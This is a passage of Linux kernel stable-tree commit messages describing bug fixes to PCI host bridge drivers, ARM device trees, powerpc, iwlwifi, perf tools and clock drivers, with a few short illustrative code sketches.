CC: Thierry Reding <treding@nvidia.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit bcd7b7186f upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridge's memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI designware host bridge driver does not remove the PCI IO resource
from the host bridge resource windows if the pci_remap_iospace() call
fails; this is an actual bug in that the PCI host bridge would consider the
PCI IO resource valid (and possibly assign it to downstream devices) even
if the kernel was not able to map the PCI host bridge memory address
driving IO cycles to the CPU virtual address space (i.e. pci_remap_iospace()
failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: cbce790059 ("PCI: designware: Make driver arch-agnostic")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Jingoo Han <jingoohan1@gmail.com>
CC: Pratyush Anand <pratyush.anand@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 53f4f7ee28 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridge's memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI versatile host bridge driver does not remove the PCI IO resource
from the host bridge resource windows if the pci_remap_iospace() call
fails; this is an actual bug in that the PCI host bridge would consider the
PCI IO resource valid (and possibly assign it to downstream devices) even
if the kernel was not able to map the PCI host bridge memory address
driving IO cycles to the CPU virtual address space (i.e. pci_remap_iospace()
failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: b7e78170ef ("PCI: versatile: Add DT-based ARM Versatile PB PCIe host driver")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Rob Herring <robh@kernel.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 43281ede01 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridge's memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI common host bridge driver does not remove the PCI IO resource from
the host bridge resource windows if the pci_remap_iospace() call fails;
this is an actual bug in that the PCI host bridge would consider the PCI IO
resource valid (and possibly assign it to downstream devices) even if the
kernel was not able to map the PCI host bridge memory address driving IO
cycles to the CPU virtual address space (i.e. pci_remap_iospace() failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: 4e64dbe226 ("PCI: generic: Expose pci_host_common_probe() for use by other drivers")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
Acked-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit db047f8a93 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridge's memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI aardvark host bridge driver does not remove the PCI IO resource
from the host bridge resource windows if the pci_remap_iospace() call
fails; this is an actual bug in that the PCI host bridge would consider the
PCI IO resource valid (and possibly assign it to downstream devices) even
if the kernel was not able to map the PCI host bridge memory address
driving IO cycles to the CPU virtual address space (i.e. pci_remap_iospace()
failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: 8c39d71036 ("PCI: aardvark: Add Aardvark PCI host controller driver")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Thomas Petazzoni <thomas.petazzoni@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 5e8c873270 upstream.
On ARM/ARM64 architectures, PCI IO ports are emulated through memory mapped
IO, by reserving a chunk of virtual address space starting at PCI_IOBASE
and by mapping the PCI host bridge's memory address space driving PCI IO
cycles to it.
PCI host bridge drivers that enable downstream PCI IO cycles map the host
bridge memory address responding to PCI IO cycles to the fixed virtual
address space through the pci_remap_iospace() API.
This means that if the pci_remap_iospace() function fails, the
corresponding host bridge PCI IO resource must be considered invalid, in
that there is no way for the kernel to actually drive PCI IO transactions
if the memory addresses responding to PCI IO cycles cannot be mapped into
the CPU virtual address space.
The PCI rcar host bridge driver does not remove the PCI IO resource from
the host bridge resource windows if the pci_remap_iospace() call fails;
this is an actual bug in that the PCI host bridge would consider the PCI IO
resource valid (and possibly assign it to downstream devices) even if the
kernel was not able to map the PCI host bridge memory address driving IO
cycles to the CPU virtual address space (i.e. pci_remap_iospace() failures).
Fix the PCI host bridge driver pci_remap_iospace() failure path, by
destroying the PCI host bridge PCI IO resources retrieved through firmware
when the pci_remap_iospace() function call fails, therefore preventing the
kernel from adding the respective PCI IO resource to the list of PCI host
bridge valid resources, fixing the issue.
Fixes: 5d2917d469 ("PCI: rcar: Convert to DT resource parsing API")
Signed-off-by: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Bjorn Helgaas <bhelgaas@google.com>
CC: Phil Edworthy <phil.edworthy@renesas.com>
CC: Simon Horman <horms+renesas@verge.net.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0b965a13ad upstream.
Commit b8d368caa8 ("ARM: dts: omap3: overo: remove unneded unit names
in display nodes") removed the unit names for all Overo display nodes
that didn't have a reg property.
But the display in arch/arm/boot/dts/omap3-overo-common-lcd35.dtsi does
have a reg property so the correct fix was to make the unit name match
the value of the reg property, instead of removing it.
This patch fixes the following DTC warning for boards using this dtsi:
"ocp/spi@48098000/display has a reg or ranges property, but no unit name"
Fixes: b8d368caa8 ("ARM: dts: omap3: overo: remove unneded unit names in display nodes")
Signed-off-by: Javier Martinez Canillas <javier@osg.samsung.com>
Signed-off-by: Tony Lindgren <tony@atomide.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c4ad72560d upstream.
The ethernet version in the earlier RealView EB variants is
LAN91C111 and not LAN9118 according to ARM DUI 0303E
"RealView Emulation Baseboard User Guide" page 3-57.
Make sure that this is used for the base variant of the board.
As the DT bindings for the LAN91C111 do not specify any power
supplies, these need to be deleted from the DTS file.
Fixes: 2440d29d2a ("ARM: dts: realview: support all the RealView EB board variants")
Signed-off-by: Linus Walleij <linus.walleij@linaro.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit c53beb47f6 upstream.
The BCM958625HR board has 2GB of RAM available. Increase the amount
from 512MB to 2GB and add the device type to the memory entry.
Fixes: 9a4865d42f ("ARM: dts: NSP: Specify RAM amount for BCM958625HR board")
Signed-off-by: Jon Mason <jon.mason@broadcom.com>
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca26475bf0 upstream.
The commit 9bf448c66d ("ARM: pxa: use generic gpio operation instead of
gpio register") from Oct 17, 2011, leads to the following static checker
warning:
arch/arm/mach-pxa/spitz_pm.c:172 spitz_charger_wakeup()
warn: double left shift '!gpio_get_value(SPITZ_GPIO_KEY_INT)
<< (1 << ((SPITZ_GPIO_KEY_INT) & 31))'
As Dan reported, the value is shifted three times:
- once by gpio_get_value(), which returns either 0 or BIT(gpio)
- once by the shift operation '<<'
- a last time by GPIO_bit(gpio) which is BIT(gpio)
Therefore the calculation leads to a chained 'or' of:
- (1 << gpio) << (1 << gpio) = (2^gpio)^gpio = 2 ^ (gpio * gpio)
It is by sheer luck that the former statement works: each gpio
used is strictly smaller than 6, so 2^(gpio^2) never
overflows a 32-bit value, and the result is only used as a boolean to
check gpio activation.
As the xxx_charger_wakeup() functions are used as a true/false detection
mechanism, take the opportunity to change their prototypes from an integer
return value to a boolean one.
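A sketch of the resulting shape (the second wakeup source shown is illustrative; only the conversion to a boolean expression matters):

    static bool spitz_charger_wakeup(void)
    {
        /* gpio_get_value() already yields 0 or non-zero for the line,
         * so no extra shift against GPIO_bit() is needed. */
        return !gpio_get_value(SPITZ_GPIO_KEY_INT) ||
               gpio_get_value(SPITZ_GPIO_SYNC);
    }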
Fixes: 9bf448c66d ("ARM: pxa: use generic gpio operation instead of
gpio register")
Reported-by: Dan Carpenter <dan.carpenter@oracle.com>
Cc: Joe Perches <joe@perches.com>
Signed-off-by: Robert Jarzmik <robert.jarzmik@free.fr>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9ba63e3cc8 upstream.
Since its initial commit, the driver has been buggy when handling multiple
interrupts. The translation from the former lubbock.c file was not
complete, and might stall all interrupt handling when multiple
interrupts occur.
This is especially true when, inside the interrupt handler, a new
interrupt comes in and is not handled: the output line is then still held,
and no new transition is created, while the GPIO block behind it would need
such a transition to trigger another cplds_irq_handler() call.
For the record, the hardware works as follows.
The interrupt mechanism relies on:
- one status register
- one mask register
Let's suppose the input irq lines are called:
- i_sa1111
- i_lan91x
- i_mmc_cd
Let's suppose the status register for each irq line is called:
- status_sa1111
- status_lan91x
- status_mmc_cd
Let's suppose the interrupt mask for each irq line is called:
- irqen_sa1111
- irqen_lan91x
- irqen_mmc_cd
Let's suppose the output irq line, connected to GPIO0, is called:
- o_gpio0
The behavior is as follows:
- o_gpio0 = not((status_sa1111 & irqen_sa1111) |
(status_lan91x & irqen_lan91x) |
(status_mmc_cd & irqen_mmc_cd))
=> this is an N-to-1 NOR gate and multiple AND gates
- irqen_* is exactly as programmed by a write to the FPGA
- status_* behavior is governed by a bi-stable D flip-flop
=> on next FPGA clock :
- if i_xxx is high, status_xxx becomes 1
- if i_xxx is low, status_xxx remains as it is
- if software sets status_xxx to 0, the D flip-flop is reset
=> status_xxx becomes 0
=> on next FPGA clock cycle, if i_xxx is high, status_xxx becomes
1 again
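Given that behaviour, the handler has to keep servicing the status register until no enabled interrupt is left pending, roughly as in this sketch (register and field names illustrative):

    unsigned long pending;
    unsigned int bit;

    do {
        pending = readl(fpga->base + FPGA_IRQ_SET_CLR) & fpga->irq_mask;
        for_each_set_bit(bit, &pending, CPLDS_NB_IRQ)
            generic_handle_irq(irq_find_mapping(fpga->irqdomain, bit));
    } while (pending);

This way, a new interrupt arriving while a previous one is being handled is picked up on the next loop iteration instead of being lost for lack of a fresh GPIO transition.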
Fixes: fc9e38c0f4 ("ARM: pxa: lubbock: use new pxa_cplds driver")
Reported-by: Russell King <rmk+kernel@armlinux.org.uk>
Signed-off-by: Robert Jarzmik <robert.jarzmik@free.fr>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6b8cb66a6a upstream.
On some CPUs like the 8xx, _PAGE_RW (hence _PAGE_WRITE) is defined
as 0, and _PAGE_RO has to be set when a page is not writable.
_PAGE_RO is defined by default in pte-common.h; however, BOOK3S/64
doesn't include that file, so _PAGE_RO has to be defined explicitly
in book3s/64/pgtable.h.
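In effect, the BOOK3S/64 header carries its own definition, something like this sketch:

    /* book3s/64 does not pull in pte-common.h, so provide the bit here;
     * 0 means there is no dedicated read-only bit on this family. */
    #define _PAGE_RO    0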
Fixes: a7b9f671f2 ("powerpc32: adds handling of _PAGE_RO")
Signed-off-by: Christophe Leroy <christophe.leroy@c-s.fr>
Reviewed-by: Aneesh Kumar K.V <aneesh.kumar@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 11b7e154b1 upstream.
When we merge two contiguous partitions whose signatures are marked
NVRAM_SIG_FREE, we need to update prev's length and checksum and then
write prev to nvram, not cur. So let's fix this mistake now.
Also use memset instead of strncpy to set the partition's name; it's
more readable when filling the field with a repeated character.
Fixes: fa2b4e54d4 ("powerpc/nvram: Improve partition removal")
Signed-off-by: Pan Xinhui <xinhui.pan@linux.vnet.ibm.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit b0f16b4698 upstream.
giveup_all() causes the FPU/VMX/VSX facilities to be disabled in a thread's
MSR. If the thread performing the giveup was transactional, the kernel
must record which facilities were in use before the giveup, as the
thread must have these facilities re-enabled on return to userspace.
From process.c:
/*
* This is called if we are on the way out to userspace and the
* TIF_RESTORE_TM flag is set. It checks if we need to reload
* FP and/or vector state and does so if necessary.
* If userspace is inside a transaction (whether active or
* suspended) and FP/VMX/VSX instructions have ever been enabled
* inside that transaction, then we have to keep them enabled
* and keep the FP/VMX/VSX state loaded while ever the transaction
* continues. The reason is that if we didn't, and subsequently
* got a FP/VMX/VSX unavailable interrupt inside a transaction,
* we don't know whether it's the same transaction, and thus we
* don't know which of the checkpointed state and the transactional
* state to use.
*/
Calling check_if_tm_restore_required() will set TIF_RESTORE_TM and
save the MSR if needed.
Fixes: c208505 ("powerpc: create giveup_all()")
Signed-off-by: Cyril Bur <cyrilbur@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit dc16b553c9 upstream.
Comment from arch/powerpc/kernel/process.c:967:
If userspace is inside a transaction (whether active or
suspended) and FP/VMX/VSX instructions have ever been enabled
inside that transaction, then we have to keep them enabled
and keep the FP/VMX/VSX state loaded while ever the transaction
continues. The reason is that if we didn't, and subsequently
got a FP/VMX/VSX unavailable interrupt inside a transaction,
we don't know whether it's the same transaction, and thus we
don't know which of the checkpointed state and the transactional
state to use.
restore_math(), restore_fp() and restore_altivec() currently may not
restore the registers. This doesn't appear to be more serious
than a performance penalty: if the math registers aren't restored, the
userspace thread will still be run with the facility disabled, so
userspace will not be able to read invalid values. On the first access
it will take a facility unavailable exception and the kernel will
detect an active transaction, at which point it will abort the
transaction. There is the possibility for a pathological case
preventing any progress by transactions, however, transactions
are never guaranteed to make progress.
Fixes: 70fe3d9 ("powerpc: Restore FPU/VEC/VSX if previously used")
Signed-off-by: Cyril Bur <cyrilbur@gmail.com>
Signed-off-by: Michael Ellerman <mpe@ellerman.id.au>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 0d667f72b2 upstream.
In _scsih_io_done() we test whether ioc->logging_level does _not_ have
the MPT_DEBUG_REPLY bit set, and if it doesn't we print the debug
messages. This unfortunately is the wrong way around.
Note, the actual bug is older than af0094115 but this commit removed the
CONFIG_SCSI_MPT3SAS_LOGGING Kconfig option which hid the bug.
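The intended logic is simply the non-negated test, along these lines (a sketch; the debug-print helper shown is illustrative of the reply debug path):

    /* print the reply debug info only when the user asked for it */
    if (ioc->logging_level & MPT_DEBUG_REPLY)
        _scsih_scsi_ioc_info(ioc, scmd, mpi_reply, smid);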
Fixes: af0094115 'mpt2sas, mpt3sas: Remove SCSI_MPTXSAS_LOGGING entry from Kconfig'
Signed-off-by: Johannes Thumshirn <jthumshirn@suse.de>
Acked-by: Chaitra P B <chaitra.basappa@broadcom.com>
Signed-off-by: Martin K. Petersen <martin.petersen@oracle.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 06ad11be7a upstream.
The R_PIO device node is missing #interrupt-cells, which causes
interrupt parsing to fail to match it as a valid interrupt controller.
Add #interrupt-cells to it. Also remove the unnecessary #address-cells
and #size-cells.
Fixes: 1ac56a6da9 ("ARM: dts: sun9i: Add A80 R_PIO pin controller device
node")
Signed-off-by: Chen-Yu Tsai <wens@csie.org>
Signed-off-by: Maxime Ripard <maxime.ripard@free-electrons.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 75cfe338b8 upstream.
We were assigning the return value of iwl_mvm_ctdp_command() to a
variable, but never checking it. If this command fails, we should not
allow the interface up process to proceed, since it is potentially
dangerous to ignore thermal management requirements.
Fixes: commit 5c89e7bc55 ("iwlwifi: mvm: add registration to cooling device")
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a73a7d24d upstream.
On the default queue we will not receive a frame release notification,
but the BAR itself.
Upon receiving the BAR, the driver should look at the NSSN and adjust
the window accordingly.
Fixes: b915c10174 ("iwlwifi: mvm: add reorder buffer per queue")
Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a0315dea90 upstream.
When a STA is removed in DQA mode, if no traffic went through
its reserved queue, the txq continues to be marked as
reserved and no STA can use it.
Make sure that in such a case the reserved queue is marked
as free when the STA is removed.
Fixes: commit 24afba7690 ("iwlwifi: mvm: support bss dynamic alloc/dealloc of queues")
Signed-off-by: Liad Kaufman <liad.kaufman@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ca3b9c6b6d upstream.
Since the SCD_QUEUE_CFG command was introduced the driver
calls iwl_trans_txq_enable_cfg() with a NULL for scd_cfg
parameter.
This makes the transport avoid writing to the SCD pointers,
since it can cause races with firmware, which is also accessing
the registers.
The transport only updates the write pointer in that case.
Fix a wrong call to iwl_trans_txq_enable() which caused a
scd_cfg parameter to be sent to the transport, resulting in an
access to SCD registers.
Fixes: 58f2cc57dc ("iwlwifi: mvm: support dqa-mode scd queue redirection")
Signed-off-by: Sara Sharon <sara.sharon@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7585c35463 upstream.
In iwl_mvm_rx_tx_cmd_single(), when checking if a given TID is
aggregated, the driver doesn't check whether or not the queue
itself can be aggregated. For example, a management queue might
be marked as aggregated if TID 0 is aggregated on a (different)
data queue.
Make sure that mgmt frames are sent with TID IWL_TID_NON_QOS,
and in this way make sure no mixups of this sort happen.
Fixes: commit 24afba7690 ("iwlwifi: mvm: support bss dynamic alloc/dealloc of queues")
Signed-off-by: Liad Kaufman <liad.kaufman@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit a6c934b364 upstream.
In 9000 family products we added an option to let the OEM fuse the
mac address via registers. If these registers are zeroed we use the OTP
address instead. Make sure that the address provided by the OEM is valid
and, if not, fall back to the OTP address as well.
Fixes: commit 17c867bfe8 ("iwlwifi: add support for getting HW address from CSR")
Signed-off-by: Haim Dreyfuss <haim.dreyfuss@intel.com>
Signed-off-by: Luca Coelho <luciano.coelho@intel.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 432746f8e0 upstream.
When we call symbol__fixup_duplicate() we use algorithms to pick the
"best" symbol for cases where there are various functions/aliases at an
address, and those algorithms check for zero-size symbols, which, before
calling symbol__fixup_end(), are _all_ the symbols in a just-parsed
kallsyms file.
So first fixup the end, then fixup the duplicates.
Found while trying to figure out why 'perf test vmlinux' failed, see the
output of 'perf test -v vmlinux' to see cases where the symbols picked
as best for vmlinux don't match the ones picked for kallsyms.
Cc: Anton Blanchard <anton@samba.org>
Cc: Adrian Hunter <adrian.hunter@intel.com>
Cc: David Ahern <dsahern@gmail.com>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Masami Hiramatsu <mhiramat@kernel.org>
Cc: Namhyung Kim <namhyung@kernel.org>
Cc: Wang Nan <wangnan0@huawei.com>
Fixes: 694bf407b0 ("perf symbols: Add some heuristics for choosing the best duplicate symbol")
Link: http://lkml.kernel.org/n/tip-rxqvdgr0mqjdxee0kf8i2ufn@git.kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 9a6ad25b5a upstream.
When the --hierarchy option is used, each entry has its own hpp_list to
show the result. But perf-top does not update the width of each column.
The perf-report command has no problem since it resets the widths while
displaying the header.
$ sudo perf top --hierarchy --stdio
PerfTop: 160 irqs/sec kernel:38.8% exact: 100.0%
[4000Hz cycles:pp], (all, 12 CPUs)
----------------------------------------------------------------------
52.32% perf
24.74% [.] __symbols__insert
5.62% [.] rb_next
5.14% [.] dso__load_sym
Move the code into hists__fprintf() so that it can be called always.
Also it'd be better to put similar code together.
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Tested-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Cc: Andi Kleen <andi@firstfloor.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Fixes: 1b2dbbf41a ("perf hists: Use own hpp_list for hierarchy mode")
Link: http://lkml.kernel.org/r/20160913074552.13284-5-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 25b8592e91 upstream.
'make -C tools/perf build-test' is failing with the below log for powerpc.
In file included from /tmp/tmp.3eEwmGlYaF/perf-4.8.0-rc4/tools/perf/perf.h:15:0,
from util/cpumap.h:8,
from util/env.c:1:
/tmp/tmp.3eEwmGlYaF/perf-4.8.0-rc4/tools/perf/perf-sys.h:23:56:
fatal error: ../../arch/powerpc/include/uapi/asm/unistd.h: No such file or directory
compilation terminated.
I bisected it and found it's failing from commit ad430729ae ("Remove:
kernel unistd*h files from perf's MANIFEST, not used").
Header file '../../arch/powerpc/include/uapi/asm/unistd.h' is included
only for powerpc in tools/perf/perf-sys.h.
By looking closely at the commit history, I found something a little weird:
Commit f2d9cae9ea ("perf powerpc: Use uapi/unistd.h to fix build
error") replaced 'asm/unistd.h' with 'uapi/asm/unistd.h'
Commit d2709c7ce4 ("perf: Make perf build for x86 with UAPI
disintegration applied") removes all arch specific 'uapi/asm/unistd.h'
for all archs and adds generic <asm/unistd.h>.
Commit f0b9abfb04 ("Merge branch 'linus' into perf/core") again
includes 'uapi/asm/unistd.h' for powerpc. I don't know exactly how this
happened, as this change is not part of that commit either.
Signed-off-by: Ravi Bangoria <ravi.bangoria@linux.vnet.ibm.com>
Cc: Alexander Shishkin <alexander.shishkin@linux.intel.com>
Cc: Peter Zijlstra <peterz@infradead.org>
Link: http://lkml.kernel.org/r/1472630591-5089-1-git-send-email-ravi.bangoria@linux.vnet.ibm.com
Fixes: ad430729ae ("Remove: kernel unistd*h files from perf's MANIFEST, not used")
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d9ea48bc4e upstream.
Milian reported that the event group on TUI shows duplicated overhead.
This was due to a bug on calculating hpp->buf position. The
hpp_advance() was called from __hpp__slsmg_color_printf() on TUI but
it's already called from the hpp__call_print_fn macro in __hpp__fmt().
The end result is that the print function returns the number of bytes it
printed, but the buffer advanced by twice that length.
This is generally not a problem since it doesn't need to access the
buffer again. But with an event group, the overhead needs to be printed
multiple times, and hist_entry__snprintf_alignment() tries to pad the
remaining space in the buffer after printing. So it (brokenly) showed
the last overhead again.
The bug was there from the beginning, but I think it's only revealed
when the alignment function was added.
Reported-by: Milian Wolff <milian.wolff@kdab.com>
Signed-off-by: Namhyung Kim <namhyung@kernel.org>
Cc: Andi Kleen <andi@firstfloor.org>
Cc: Jiri Olsa <jolsa@kernel.org>
Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
Fixes: 89fee70943 ("perf hists: Do column alignment on the format iterator")
Link: http://lkml.kernel.org/r/20160912061958.16656-2-namhyung@kernel.org
Signed-off-by: Arnaldo Carvalho de Melo <acme@redhat.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2cf9a57811 upstream.
clk-divider uses clk_readl()/clk_writel() everywhere, except in
clk_divider_round_rate(), where plain readl() is used. Change this to
clk_readl(), as it makes a difference on powerpc.
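That is, the read-only path in clk_divider_round_rate() reads the divider the same way the rest of the file does, roughly (sketch):

    if (divider->flags & CLK_DIVIDER_READ_ONLY) {
        bestdiv = clk_readl(divider->reg) >> divider->shift;
        bestdiv &= div_mask(divider->width);
        /* continue the round_rate calculation with bestdiv as before */
    }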
Fixes: e6d5e7d90b ("clk-divider: Fix READ_ONLY when divider > 1")
Signed-off-by: Geert Uytterhoeven <geert+renesas@glider.be>
Reviewed-by: James Hogan <james.hogan@imgtec.com>
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 3174b0c9a6 upstream.
This patch reverts commit 023bd7166b ("clk: skip unnecessary
set_phase if nothing to do"), fixing two problems:
* in some SoCs, the hardware phase delay depends on the rate ratio of
the clock and its parent. So, changing this ratio may require setting
new hardware values, even if the logical delay is the same.
* when the delay was the same as previously, an error was returned.
Signed-off-by: Jean-Francois Moine <moinejf@free.fr>
Fixes: 023bd7166b ("clk: skip unnecessary set_phase if nothing to do")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit f155d15b64 upstream.
Before commit 0861e5b8cf (clk: Add clk_hw OF clk providers,
2016-02-05) __of_clk_get_from_provider() would return an error
pointer of the provider's choosing if there was a provider
registered and EPROBE_DEFER otherwise. After that commit, it
would return EPROBE_DEFER regardless of whether or not the
provider returned an error. This is odd and can lead to behavior
where clk consumers keep probe deferring when they should be
seeing some other error.
Let's restore the previous behavior where we only return
EPROBE_DEFER when there isn't a provider in our of_clk_providers
list. Otherwise, return the error from the last provider we find
that matches the node.
Reported-by: Masahiro Yamada <yamada.masahiro@socionext.com>
Fixes: 0861e5b8cf ("clk: Add clk_hw OF clk providers")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 8964193f6b upstream.
The offset of the Core Cluster clock control/status register
on the cluster group V3 version is different from the others, and
needs an additional 0x70000.
Signed-off-by: Tang Yuantian <yuantian.tang@nxp.com>
Reviewed-by: Scott Wood <oss@buserror.net>
Fixes: 9e19ca2f62 ("clk: qoriq: Add ls2080a support.")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 6d91f2c014 upstream.
This patch selects the QCOM_GDSC Kconfig option for the msm8996 GCC and
MMCC clock controllers, as these provide some of the GDSCs on the SoC.
Selecting this config also aligns them with other drivers which
do the same.
Signed-off-by: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Fixes: 52111672f7 ("clk: qcom: gdsc: Add GDSCs in msm8996 GCC")
Fixes: 7e824d5079 ("clk: qcom: gdsc: Add mmcc gdscs for msm8996 family")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit ce61966c05 upstream.
This patch corrects the register offset for pcie2 pipe clock.
Offset according to datasheet is 0x6e018 instead of 0x6e108.
Signed-off-by: Srinivas Kandagatla <srinivas.kandagatla@linaro.org>
Fixes: b1e010c073 ("clk: qcom: Add MSM8996 Global Clock Control (GCC) driver")
Signed-off-by: Stephen Boyd <sboyd@codeaurora.org>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 67615c588a upstream.
If the firmware had set up a clock to source from PLLC, go along with
it. But if we're looking for a new parent, we don't want to switch it
to PLLC because the firmware will force PLLC (and thus the AXI bus
